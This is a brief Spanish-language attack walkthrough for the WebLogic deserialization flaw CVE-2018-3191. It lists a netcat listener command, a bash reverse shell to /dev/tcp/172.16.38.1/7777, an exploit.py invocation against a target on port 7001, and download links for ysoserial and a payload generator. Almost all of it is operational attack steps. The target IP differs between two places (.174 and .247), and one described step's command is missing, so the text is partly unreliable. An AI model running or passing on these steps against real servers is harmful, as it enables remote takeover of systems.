
CVE-2018-3191 shell inversa
CVE-2018-3191 reverse shell IP local: 172.16.38.1 Weblogic: 172.16.38.174:7001
Luego ejecutar nc -lvv 7777
(1) El comando bash se codificó en base64 para evitar que Runtime.getRuntime().exec() escape los caracteres especiales durante la ejecución. El texto plano es: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Esta operación inicia un JRMPListener localmente, que recibe la solicitud de Weblogic atacado y ejecuta el comando bash de reverse shell especificado. (3) Nc escucha en el puerto 7777 esperando la conexión reverse bash del host Weblogic. 2. Ejecutar python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, explotando la vulnerabilidad para que Weblogic acceda al servicio RMI remoto y ejecute el comando bash de reverse shell.
Herramientas necesarias para el ataque: ysoserial-master.jar // herramienta de explotación de deserialización https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // generador de payload para CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // herramienta de envío del protocolo T3 de Weblogic, integra el payload de CVE-2018-3191